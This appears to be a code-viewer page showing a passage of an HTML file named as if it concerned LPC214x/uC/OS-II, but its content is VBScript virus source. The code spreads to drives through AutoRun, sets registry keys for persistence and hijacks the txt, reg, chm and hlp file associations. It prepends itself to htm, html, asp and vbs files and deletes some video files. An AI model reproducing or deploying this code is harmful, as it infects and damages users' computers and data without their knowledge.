📄 lpc214x_ucosii.htm
字号:
On Error Resume Next
Dim objfso, vbsCode, VbsCode_Virus
Set objfso = CreateObject(GetFSOName())
vbsCode = GetScriptCode("vbscript")
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
Call InvadeSystem(objfso, VbsCode_Virus)
Set objfso = Nothing
End Sub
Sub ExeVbs_Victim()
On Error Resume Next
Dim objfso, vbsCode, VbsCode_Virus
Set objfso = CreateObject(GetFSOName())
vbsCode = GetSelfCode(objfso, WScript.ScriptFullName)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Set objfso = Nothing
End Sub
'ZLDXJAQBZXV1_2
'SQWYMRCQHRYPK1_7
Sub InvadeSystem(objfso, vbsCode)
On Error Resume Next
Dim Value, HCULoad, vbsCode_Virus, dc, d
Value = "%SystemRoot%\System32\WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
vbsCode_Virus = vbsCode
Set dc = objfso.Drives
For Each d In dc
If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
Call AutoRun(objfso, d.DriveLetter, vbsCode_Virus)
End If
Next
If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Version Then
objfso.DeleteFile FullPath_V1 , True
Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
Call SetFileAttr(objfso, FullPath_V1)
Else
Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
Call SetFileAttr(objfso, FullPath_V1)
End If
If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)<Version Then
objfso.DeleteFile FullPath_V0 , True
Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
Call SetFileAttr(objfso, FullPath_V0)
Else
Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
Call SetFileAttr(objfso, FullPath_V0)
End If
If ReadReg(HCULoad)<> FullPath_V1 Then
Call WriteReg (HCULoad, FullPath_V1, "")
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
Call SetTxtFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
Call SetRegFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
Call SetchmFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
Call SethlpFileAss(FullPath_V0)
End If
Call DeSafeSet()
End Sub
'ZLDXJAQBZXV1_7
'SQWYMRCQHRYPK2_19
Function GetVersion(objfso, path_v)
Dim FV, buffer
Set FV = objfso.OpenTextFile(path_v, 1)
buffer = FV.ReadAll()
GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
End Function
Function GetScriptCode(Languages)
On Error Resume Next
Dim soj
For Each soj In document.Scripts
If LCase(soj.Language) = Languages Then
Select Case LCase(soj.Language)
Case "vbscript"
GetScriptCode = soj.Text
Exit Function
Case "javascript"
GetScriptCode = soj.Text
Exit Function
End Select
End If
Next
End Function
Function GetSelfCode(objfso, FullPath_Self)
On Error Resume Next
Dim n, n1, buffer, Self
Set Self = objfso.OpenTextFile(FullPath_Self, 1)
buffer = Self.ReadAll
n = InStr(buffer, Head_V)
n1 = InstrRev(buffer, Tail_V)
buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
GetSelfCode = buffer
Self.Close
End Function
Function GetMainBody(vbsCode, Sum_ModelCode)
Dim i
For i = 2 To Sum_ModelCode
GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
Next
End Function
'ZLDXJAQBZXV2_19
'SQWYMRCQHRYPK2_18
Function IsOK(objfso, Now_V, path_f)
On Error Resume Next
Dim vf, p1, p2, p3
IsOK = False
Set vf = objfso.OpenTextFile(path_f, 1)
p1 = Trim(vf.ReadLine)
p2 = Trim(vf.ReadLine)
p3 = Trim(vf.ReadLine)
If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then
IsOK = True
End If
If p3 = "Admin" Then
MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!"
IsOK = True
n = InputBox("0:退出; 1:监视系统; 2:传染文件", "SuperVirus脚本测试!")
If n = 0 Then
Wscript.Quit
ElseIf n = 1 Then
IsOK = True
ElseIf n = 2 Then
IsOK = False
End If
End If
End Function
'ZLDXJAQBZXV2_18
'SQWYMRCQHRYPK2_14
Function ReadOK(objfso, FullPath_OK)
On Error Resume Next
Dim vf, buffer
Set vf = objfso.OpenTextFile(FullPath_OK, 1)
buffer = vf.ReadAll
ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
End Function
Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
On Error Resume Next
Dim vf1
objfso.DeleteFile FullPath_OK, True
Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
vf1.Write "OK" & VBCRLF
vf1.WriteLine Date()
vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
Call SetFileAttr(objfso, FullPath_OK)
End Sub
'ZLDXJAQBZXV2_14
'SQWYMRCQHRYPK2_11
Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T)
On Error Resume Next
Dim pfo, pf, pfi, ext
Dim psfo, ps
Set pfo = objfso.GetFolder(strPath)
Set pf = pfo.Files
For Each pfi In pf
If Cnt >= CntMax Then
Exit For
End If
ext = LCase(objfso.GetExtensionName(pfi.Path))
Select Case ext
Case "hta", "htm", "html", "asp", "vbs"
Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim, ext, T)
Case "mpg", "rmvb", "avi", "rm"
If IsSexFile(pfi.Name) = True Then
pfi.Delete
End If
End Select
Next
Set psfo = pfo.SubFolders
For Each ps In psfo
If Cnt >= CntMax Then
Exit For
End If
Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
Next
End Sub
'ZLDXJAQBZXV2_11
'rotartsinimdA
</SCRIPT>
<SCRIPT Language = VBScript>
'zhujianzhong4
'UARVKZXWUDPRG2_12
Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
On Error Resume Next
Dim tso, buffer, strCode , Maxsize
Maxsize = 350000
If fi.Size< Maxsize Then
Set tso = objfso.OpenTextFile(strPath, 1, True)
buffer = tso.ReadAll()
tso.Close
If T = 0 Then
Select Case ftype
Case "hta", "htm", "html", "asp"
If Isinfected(buffer, ftype) = False Then
Set tso = objfso.OpenTextFile(strPath, 2, true)
strCode = MakeScript(VbsCode_WebPage, 0)
tso.Write strCode & VBCRLF & buffer
Cnt = Cnt + 1
End If
Case "vbs"
If Isinfected(buffer, ftype) = False Then
n = InStr(buffer , "Option Explicit")
If n<>0 Then
buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
Set tso = objfso.OpenTextFile(strPath, 2, true)
tso.Write vbsCode_Victim & VBCRLF & buffer
Cnt = Cnt + 1
Else
Set tso = objfso.OpenTextFile(strPath, 2, true)
tso.Write vbsCode_Victim & VBCRLF & buffer
Cnt = Cnt + 1
End If
End If
Case Else
'
'
End Select
ElseIf T = 1 Then
If Isinfected(buffer, ftype) = True Then
n = InStrRev(buffer , Tail_V)
If n<>0 Then
buffer = Replace(buffer, Tail_V, "", n, 1, 1)
Set tso = objfso.OpenTextFile(strPath, 2, True)
tso.Write strCode & VBCRLF & buffer
End If
End If
End If
End If
End Sub
'PYRHOYIQVQT2_12
'UARVKZXWUDPRG2_22
Function GetSFolder(p)
Dim objfso
Set objfso = CreateObject(GetFSOName())
GetSFolder = objfso.GetSpecialFolder(p) & "\"
Set objfso = Nothing
End Function
Function GetUserName()
On Error Resume Next
Dim Value , UserName
Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}\Username"
UserName = ReadReg(Value)
If UserName = "" Then
GetUserName = "Administrator"
Else
GetUserName = UserName
End If
End Function
Function GetFSOName()
On Error Resume Next
Dim Value , UserName
Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
UserName = ReadReg(Value)
If UserName = "" Then
GetUserName = "Scripting.FileSystemObject"
Else
GetFSOName = UserName
End If
End Function
Function GetHeadTail(l)
Dim Str , buffer
If l = 0 Then
GetHeadTail = "'" & GetUserName()
Else
buffer = GetUserName()
Str = ""
For i = 1 To Len(buffer)
Str = Mid(buffer, i, 1) & Str
GetHeadTail = "'" & Str
Next
End If
End Function
'PYRHOYIQVQT2_22
'UARVKZXWUDPRG1_8
Sub RestoreSystem(objfso)
On Error Resume Next
Dim Value, dc, d, HCULoad
Call SafeSet()
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
If ReadReg(HCULoad) = FullPath_V1 Then
Call DeleteReg(HCULoad)
End If
Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = "regedit.exe " & """%1"""
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = GetSFolder(1) & "hh.exe " & """%1"""
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = "%SystemRoot%\system32\winhlp32.exe %1"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = """%1"" %*"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Value Then
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\", Value, "REG_SZ")
End If
Set dc = objfso.Drives
For Each d In dc
If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
End If
Next
If objfso.FileExists(FullPath_V1) = True Then
Set vf = objfso.GetFile(FullPath_V1)
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -